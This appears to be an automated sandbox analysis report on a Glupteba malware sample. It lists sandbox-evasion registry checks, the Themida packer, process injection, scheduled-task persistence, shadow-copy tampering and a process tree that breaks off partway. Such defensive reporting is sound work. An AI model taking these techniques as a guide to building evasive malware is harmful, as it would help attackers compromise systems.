glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	JAiRuPBEL6ZLTfCsbtGVppmG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WbaEZ41fIiXVPDHICkhnqfSV.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WbaEZ41fIiXVPDHICkhnqfSV.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dPu5Epg3rEzRvbeQXIfAz6YC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dPu5Epg3rEzRvbeQXIfAz6YC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	JAiRuPBEL6ZLTfCsbtGVppmG.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Setup (11).exe

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral6/files/0x000100000001abb6-138.dat	themida
behavioral6/files/0x000100000001abb7-143.dat	themida
behavioral6/files/0x000100000001abb6-163.dat	themida
behavioral6/files/0x000100000001abb7-170.dat	themida
behavioral6/memory/2936-221-0x0000000001050000-0x0000000001051000-memory.dmp	themida
behavioral6/memory/2104-237-0x00000000008F0000-0x00000000008F1000-memory.dmp	themida
behavioral6/files/0x000100000001abc8-324.dat	themida
behavioral6/files/0x000100000001abc8-294.dat	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	dPu5Epg3rEzRvbeQXIfAz6YC.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	JAiRuPBEL6ZLTfCsbtGVppmG.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WbaEZ41fIiXVPDHICkhnqfSV.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
128	ipinfo.io
129	ipinfo.io
199	ip-api.com
1452	geoiptool.com
28	ipinfo.io
29	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2936	JAiRuPBEL6ZLTfCsbtGVppmG.exe
2104	WbaEZ41fIiXVPDHICkhnqfSV.exe
4908	dPu5Epg3rEzRvbeQXIfAz6YC.exe

Suspicious use of SetThreadContext 21 IoCs

description	pid	Process	procid_target
PID 1304 set thread context of 4300	1304	k3Z11ep7frdUbEELVMXBjUko.exe	104
PID 1228 set thread context of 4364	1228	pD2LEcglTvJ1L4nFL7ok9ltD.exe	105
PID 1304 set thread context of 4420	1304	k3Z11ep7frdUbEELVMXBjUko.exe	106
PID 3788 set thread context of 4644	3788	XGPRwYq4OsMDhG6fW9rqUvUa.exe	108
PID 1228 set thread context of 4508	1228	pD2LEcglTvJ1L4nFL7ok9ltD.exe	107
PID 1304 set thread context of 4676	1304	k3Z11ep7frdUbEELVMXBjUko.exe	109
PID 1228 set thread context of 5064	1228	pD2LEcglTvJ1L4nFL7ok9ltD.exe	144
PID 1304 set thread context of 5108	1304	k3Z11ep7frdUbEELVMXBjUko.exe	112
PID 1304 set thread context of 4256	1304	k3Z11ep7frdUbEELVMXBjUko.exe	113
PID 1544 set thread context of 5092	1544	nR9fDndsaDoNpezRePWDl_or.exe	118
PID 3152 set thread context of 4352	3152	rN4MICy74_ONqrzmtiWD6m9R.exe	136
PID 1228 set thread context of 4904	1228	pD2LEcglTvJ1L4nFL7ok9ltD.exe	115
PID 1304 set thread context of 1548	1304	k3Z11ep7frdUbEELVMXBjUko.exe	116
PID 1228 set thread context of 184	1228	pD2LEcglTvJ1L4nFL7ok9ltD.exe	120
PID 4792 set thread context of 5144	4792	MEQBDkXhWRMl5RraOMNYu3oY.exe	121
PID 1228 set thread context of 5484	1228	pD2LEcglTvJ1L4nFL7ok9ltD.exe	135
PID 1228 set thread context of 5856	1228	pD2LEcglTvJ1L4nFL7ok9ltD.exe	127
PID 4792 set thread context of 5912	4792	MEQBDkXhWRMl5RraOMNYu3oY.exe	128
PID 4000 set thread context of 3788	4000	XGPRwYq4OsMDhG6fW9rqUvUa.exe	140
PID 1304 set thread context of 5988	1304	k3Z11ep7frdUbEELVMXBjUko.exe	130
PID 1228 set thread context of 5132	1228	pD2LEcglTvJ1L4nFL7ok9ltD.exe	139

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst1.exe	k3Z11ep7frdUbEELVMXBjUko.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	k3Z11ep7frdUbEELVMXBjUko.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	k3Z11ep7frdUbEELVMXBjUko.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	vIYd2QFsGaAmUJlDeZrlPZu5.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	vIYd2QFsGaAmUJlDeZrlPZu5.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	k3Z11ep7frdUbEELVMXBjUko.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	k3Z11ep7frdUbEELVMXBjUko.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 20 IoCs

pid	pid_target	Process	procid_target
4372	1916	WerFault.exe	83
5432	1916	WerFault.exe	83
5936	1916	WerFault.exe	83
6080	1916	WerFault.exe	83
2740	1916	WerFault.exe	83
6756	6404	WerFault.exe	174
3548	6008	WerFault.exe	156
7548	1380	WerFault.exe	211
4212	4548	WerFault.exe	281
4212	8272	WerFault.exe	284
9424	9256	WerFault.exe	328
10940	10596	WerFault.exe	359
11760	11352	WerFault.exe	415
12252	11900	WerFault.exe	422
7264	11596	WerFault.exe	432
11780	11520	WerFault.exe	439
5908	10896	WerFault.exe	469
12956	12540	WerFault.exe	485
13144	9564	WerFault.exe	514
8172	12432	WerFault.exe	525

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	WbcZX_p1JgKzVjdgEOsRioaK.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	WbcZX_p1JgKzVjdgEOsRioaK.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	WbcZX_p1JgKzVjdgEOsRioaK.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wOqqdZSlzY3eeVsDcThcBP2y.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wOqqdZSlzY3eeVsDcThcBP2y.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wOqqdZSlzY3eeVsDcThcBP2y.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5568	schtasks.exe
5516	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
7952	timeout.exe
17288	timeout.exe
8056	timeout.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
14708	vssadmin.exe
36440	Process not Found

Kills process with taskkill 4 IoCs

evasion

pid	Process
6836	taskkill.exe
7312	taskkill.exe
8116	taskkill.exe
8076	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3540	Setup (11).exe
3540	Setup (11).exe
4644	WbcZX_p1JgKzVjdgEOsRioaK.exe
4644	WbcZX_p1JgKzVjdgEOsRioaK.exe
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
3784	wOqqdZSlzY3eeVsDcThcBP2y.exe
3784	wOqqdZSlzY3eeVsDcThcBP2y.exe
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2756	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4644	WbcZX_p1JgKzVjdgEOsRioaK.exe
3784	wOqqdZSlzY3eeVsDcThcBP2y.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3680	mYYZg1MTWt3e9GiK4RCXLa5_.exe
Token: SeDebugPrivilege	4300	k3Z11ep7frdUbEELVMXBjUko.exe
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeDebugPrivilege	2936	JAiRuPBEL6ZLTfCsbtGVppmG.exe
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeRestorePrivilege	4372	WerFault.exe
Token: SeBackupPrivilege	4372	WerFault.exe
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeDebugPrivilege	4372	WerFault.exe
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found
Token: SeShutdownPrivilege	2756	Process not Found
Token: SeCreatePagefilePrivilege	2756	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3540 wrote to memory of 3876	3540	Setup (11).exe	82
PID 3540 wrote to memory of 3876	3540	Setup (11).exe	82
PID 3540 wrote to memory of 628	3540	Setup (11).exe	80
PID 3540 wrote to memory of 628	3540	Setup (11).exe	80
PID 3540 wrote to memory of 628	3540	Setup (11).exe	80
PID 3540 wrote to memory of 3788	3540	Setup (11).exe	81
PID 3540 wrote to memory of 3788	3540	Setup (11).exe	81
PID 3540 wrote to memory of 3788	3540	Setup (11).exe	81
PID 3540 wrote to memory of 1304	3540	Setup (11).exe	79
PID 3540 wrote to memory of 1304	3540	Setup (11).exe	79
PID 3540 wrote to memory of 1304	3540	Setup (11).exe	79
PID 3540 wrote to memory of 1376	3540	Setup (11).exe	78
PID 3540 wrote to memory of 1376	3540	Setup (11).exe	78
PID 3540 wrote to memory of 1916	3540	Setup (11).exe	83
PID 3540 wrote to memory of 1916	3540	Setup (11).exe	83
PID 3540 wrote to memory of 1916	3540	Setup (11).exe	83
PID 3540 wrote to memory of 1776	3540	Setup (11).exe	86
PID 3540 wrote to memory of 1776	3540	Setup (11).exe	86
PID 3540 wrote to memory of 1776	3540	Setup (11).exe	86
PID 3540 wrote to memory of 3772	3540	Setup (11).exe	85
PID 3540 wrote to memory of 3772	3540	Setup (11).exe	85
PID 3540 wrote to memory of 3772	3540	Setup (11).exe	85
PID 3540 wrote to memory of 2936	3540	Setup (11).exe	84
PID 3540 wrote to memory of 2936	3540	Setup (11).exe	84
PID 3540 wrote to memory of 2936	3540	Setup (11).exe	84
PID 3540 wrote to memory of 2104	3540	Setup (11).exe	92
PID 3540 wrote to memory of 2104	3540	Setup (11).exe	92
PID 3540 wrote to memory of 2104	3540	Setup (11).exe	92
PID 3540 wrote to memory of 1516	3540	Setup (11).exe	90
PID 3540 wrote to memory of 1516	3540	Setup (11).exe	90
PID 3540 wrote to memory of 1516	3540	Setup (11).exe	90
PID 3540 wrote to memory of 3524	3540	Setup (11).exe	89
PID 3540 wrote to memory of 3524	3540	Setup (11).exe	89
PID 3540 wrote to memory of 3524	3540	Setup (11).exe	89
PID 3540 wrote to memory of 3796	3540	Setup (11).exe	93
PID 3540 wrote to memory of 3796	3540	Setup (11).exe	93
PID 3540 wrote to memory of 3796	3540	Setup (11).exe	93
PID 3540 wrote to memory of 3152	3540	Setup (11).exe	96
PID 3540 wrote to memory of 3152	3540	Setup (11).exe	96
PID 3540 wrote to memory of 3152	3540	Setup (11).exe	96
PID 3540 wrote to memory of 684	3540	Setup (11).exe	94
PID 3540 wrote to memory of 684	3540	Setup (11).exe	94
PID 3540 wrote to memory of 684	3540	Setup (11).exe	94
PID 3540 wrote to memory of 3784	3540	Setup (11).exe	95
PID 3540 wrote to memory of 3784	3540	Setup (11).exe	95
PID 3540 wrote to memory of 3784	3540	Setup (11).exe	95
PID 3540 wrote to memory of 1228	3540	Setup (11).exe	100
PID 3540 wrote to memory of 1228	3540	Setup (11).exe	100
PID 3540 wrote to memory of 1228	3540	Setup (11).exe	100
PID 3540 wrote to memory of 3680	3540	Setup (11).exe	98
PID 3540 wrote to memory of 3680	3540	Setup (11).exe	98
PID 3540 wrote to memory of 1544	3540	Setup (11).exe	101
PID 3540 wrote to memory of 1544	3540	Setup (11).exe	101
PID 3540 wrote to memory of 1544	3540	Setup (11).exe	101
PID 3540 wrote to memory of 2792	3540	Setup (11).exe	102
PID 3540 wrote to memory of 2792	3540	Setup (11).exe	102
PID 3540 wrote to memory of 2792	3540	Setup (11).exe	102
PID 3540 wrote to memory of 4000	3540	Setup (11).exe	103
PID 3540 wrote to memory of 4000	3540	Setup (11).exe	103
PID 3540 wrote to memory of 4000	3540	Setup (11).exe	103
PID 1304 wrote to memory of 4300	1304	k3Z11ep7frdUbEELVMXBjUko.exe	104
PID 1304 wrote to memory of 4300	1304	k3Z11ep7frdUbEELVMXBjUko.exe	104
PID 1304 wrote to memory of 4300	1304	k3Z11ep7frdUbEELVMXBjUko.exe	104
PID 1228 wrote to memory of 4364	1228	pD2LEcglTvJ1L4nFL7ok9ltD.exe	105

C:\Users\Admin\AppData\Local\Temp\Setup (11).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (11).exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3540
- C:\Users\Admin\Documents\jcnperUxzxvMznDw0WEm5r0C.exe
  "C:\Users\Admin\Documents\jcnperUxzxvMznDw0WEm5r0C.exe"
  2⤵
  - Executes dropped EXE
  PID:1376
- C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
  "C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1304
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4300
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    - Executes dropped EXE
    PID:4420
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    - Executes dropped EXE
    PID:4676
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    - Executes dropped EXE
    PID:5108
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    - Executes dropped EXE
    PID:4256
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    - Executes dropped EXE
    PID:1548
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    - Executes dropped EXE
    PID:5308
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    - Executes dropped EXE
    PID:5988
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    - Executes dropped EXE
    PID:5672
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:5328
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:5164
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:3512
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:4920
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:6252
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:6532
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:6844
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:6336
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:6196
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:6448
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:6184
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:7584
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:8040
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:7616
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:5076
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:6952
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:8452
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:9004
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:8532
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:7768
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:8504
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:4116
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:5664
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:8272
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8272 -s 24
      4⤵
      Program crash
      PID:4212
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:5480
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:7944
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:9624
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:10028
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:7140
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:6980
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:9392
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:7444
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:9256
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9256 -s 24
      4⤵
      Program crash
      PID:9424
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:10100
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:8512
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:9700
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:8868
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:9036
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:7512
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:10276
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:10596
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 10596 -s 24
      4⤵
      Program crash
      PID:10940
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:10920
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:10304
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:5304
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:11260
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
    3⤵
    PID:10932
- - C:\Users\Admin\Documents\k3Z11ep7frdUbEELVMXBjUko.exe
